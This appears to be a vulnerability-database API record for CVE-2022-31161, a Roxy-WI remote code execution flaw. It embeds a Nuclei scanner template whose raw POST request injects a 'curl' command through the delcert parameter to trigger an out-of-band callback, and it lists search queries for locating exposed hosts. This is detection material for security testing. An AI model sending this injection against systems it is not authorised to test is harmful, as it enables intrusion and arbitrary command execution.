{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-31161/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-31161/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-31161/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-31161/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-31161/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-31161"},"sightings":{"href":"/api/v1/sightings/cve-2022-31161"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-31161.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-31161\n\ninfo:\n  name: Roxy-WI - Remote Code Execution\n  author: ritikchaddha\n  severity: critical\n  description: |\n    Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the delcert parameter without proper input validation in the /app/options.py file, allowing attackers to inject arbitrary OS commands.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Users are advised to upgrade to latest version.\n  reference:\n    - https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/\n    - https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-pg3w-8p63-x483\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-31161\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-31161\n    cwe-id: CWE-78\n    epss-score: 0.28411\n    epss-percentile: 0.9806\n    cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: roxy-wi\n    product: roxy-wi\n    shodan-query: html:\"Roxy-WI\"\n    fofa-query: body=\"roxy-wi\"\n  tags: cve2022,cve,rce,roxy,roxy-wi,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /app/options.py HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n        show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20curl%20{{interactsh-url}};\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: curl\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450221008357b83ec2e9f1042f9b0d18fc727fca8b37ffcd6ab635a88e26e64ddaff0131022033f4b65ef866fb0e9f18af2ed086154e2c95b1083956bcb61dc587a613a6ea9b:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-31161"}